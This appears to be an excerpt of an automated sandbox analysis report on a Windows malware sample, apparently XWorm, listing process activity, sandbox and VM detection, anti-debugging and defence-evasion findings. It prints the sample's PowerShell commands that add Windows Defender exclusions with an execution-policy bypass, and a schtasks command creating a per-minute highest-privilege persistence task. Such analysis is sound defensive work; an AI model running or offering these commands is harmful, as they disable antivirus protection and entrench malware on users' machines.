                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\codingProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\24572628.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\24572628.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\24572628.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: 24572628.exe, 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: YPzNsfg4nR.exe, 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, 24572628.exe, 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, coding.3.dr, 24572628.exe.0.drBinary or memory string: SBIEDLL.DLLY7WSCZEMVG3SCUE2KEQXU280Z45LZRXBPLAGFMYKOAMGSYZVCJ3QOVQATHWYJKQZYJQFQPTMMQGYFD9IEFKNQ32XQJYVBVQSNHRI8MWCYCJLBQDICU7XN5RMWYDJWWBVMQIHLJZYMV4R2E3INK1OPZMXDPIEODQZN4PGVMODTDY1S9FO5AQQYKZNRTFYJEURF0LIPCFKPBHPW0TP9GLJ5SYGGQ0PQRZFWY3VNU5N7ZXJTAIIF8Y8JWS0JWQZXGGS56FJXVB9KS11CRYB9MO6CFKM44TLLLLSIOLK0SLCFDG5B7OKSXEXUSFEW4DY0SLRAV2DZQOXBAD6DHPJDUVQEYMAE9EONC5N2WIVEPHXYQCHZZMQCFY0EGPQLSXIIH6Y5L7H3DUDMARCGXLVDHHQNY7MLEV9OHL1XX9WMRJQWYLARFRC98RMASSU77R7O9E2T5YWQHBWRCEDZE7DZVEGE8JZJNMKWQRTMZ3RVO4YWDSXA5PYEJSGHLMJ4TM4KJEOSUGK5ZQ2LVDMLBGSACRI4FHA70WWYFHEAXGJPVRPIMMIJ7OQS4FQTQTCW3RLPMDRQPSXCUZYAYZR7FPXJHQBRZ07BCWMY6T8E1CGIAFO8YT6XGFWQTSCMLINFO
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeMemory allocated: 20868E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeMemory allocated: 2086A700000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeMemory allocated: A80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeMemory allocated: 1A5E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\codingMemory allocated: 670000 memory reserve | memory write watch
                    Source: C:\ProgramData\codingMemory allocated: 1A430000 memory reserve | memory write watch
                    Source: C:\ProgramData\codingMemory allocated: 12B0000 memory reserve | memory write watch
                    Source: C:\ProgramData\codingMemory allocated: 1AD50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\ProgramData\codingThread delayed: delay time: 922337203685477
                    Source: C:\ProgramData\codingThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\24572628.exeWindow / User API: threadDelayed 9337Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeWindow / User API: threadDelayed 510Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6223Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3608Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7409Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2189Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7415Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2019Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7418
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2201
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exe TID: 7472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exe TID: 5324Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep count: 7409 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep count: 2189 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep count: 7415 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4796Thread sleep count: 2019 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 7418 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 2201 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2292Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\ProgramData\coding TID: 3440Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 8060Thread sleep time: -30000s >= -30000s
                    Source: C:\ProgramData\coding TID: 8072Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Users\user\Desktop\24572628.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\24572628.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\ProgramData\codingFile Volume queried: C:\ FullSizeInformation
                    Source: C:\ProgramData\codingFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\ProgramData\codingThread delayed: delay time: 922337203685477
                    Source: C:\ProgramData\codingThread delayed: delay time: 922337203685477
                    Source: 24572628.exe.0.drBinary or memory string: vmware
                    Source: svchost.exe, 00000013.00000002.3423237128.00000284AE42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                    Source: svchost.exe, 00000013.00000002.3424437338.00000284AF858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 24572628.exe, 00000003.00000002.3436634276.000000001B3C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\24572628.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\24572628.exeCode function: 3_2_00007FF848A47A81 CheckRemoteDebuggerPresent,3_2_00007FF848A47A81
                    Source: C:\Users\user\Desktop\24572628.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\ProgramData\codingProcess token adjusted: Debug
                    Source: C:\ProgramData\codingProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess created: C:\Users\user\Desktop\24572628.exe "C:\Users\user\Desktop\24572628.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"Jump to behavior
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: 24572628.exe, 00000003.00000002.3428603021.0000000002657000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
